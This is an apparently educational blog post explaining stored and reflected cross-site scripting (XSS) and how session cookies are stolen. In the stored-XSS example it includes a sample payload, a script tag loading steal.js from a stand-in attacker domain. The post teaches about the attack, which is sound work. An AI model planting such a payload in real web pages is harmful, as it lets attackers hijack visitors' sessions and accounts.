For this blog post I will be discussing XSS attacks: what this type of attack is, how attackers carry it out, a real-world example of people exploiting this vulnerability, and how to prevent an attacker from exploiting it on your site. So, what exactly is a cross-site scripting (XSS) attack? It is an attack that targets the users of a web application rather than manipulating the application itself. A successful cross-site scripting attack fools users of a web application into unknowingly surrendering their private data, and lets the attacker obtain a user’s session cookies in order to impersonate that particular user. There are two XSS attack types. The first is stored XSS, where an attacker places tainted script directly into a web application so that it affects anyone who visits the site. The other is reflected XSS, where tainted script is reflected by the web application into the user’s browser; the tainted script is hidden in a link and executes once the user clicks on it.
Let’s take a more in-depth look at XSS attacks, with an example of exactly how an attacker would carry out a stored XSS attack. First the attacker must study the website to find a weak point where HTML tags can be embedded in some section of the site. Once the attacker does this, the script they embed is stored on the website. For example, an attacker could hide a malicious script in the site behind text such as: Make millions click here <script src=http://nothingfishy.com/steal.js></script>. Every time the page loads, the hidden script executes and can steal the session cookies of anyone who visits the site. With a user’s session cookie, the attacker can then gain access to that person’s account. Once the attacker has access to the victim’s account, they can read sensitive information and impersonate the user. All of this happens just because a user visited a compromised web page, without them having to click on anything that looked suspicious. In a reflected XSS attack, by contrast, the attacker embeds the malicious script in a link to the website and tries to hide it. This method does not execute automatically when the site loads, as the stored XSS attack does. Instead, the user has to click the link for the attack to execute and for the user’s session cookies to be exposed to the attacker. So the more damaging attack is the stored XSS attack, because it can collect the session cookies of everyone who visits the web page, allowing the attacker to access many different accounts, as opposed to having to trick someone into clicking a suspicious-looking link.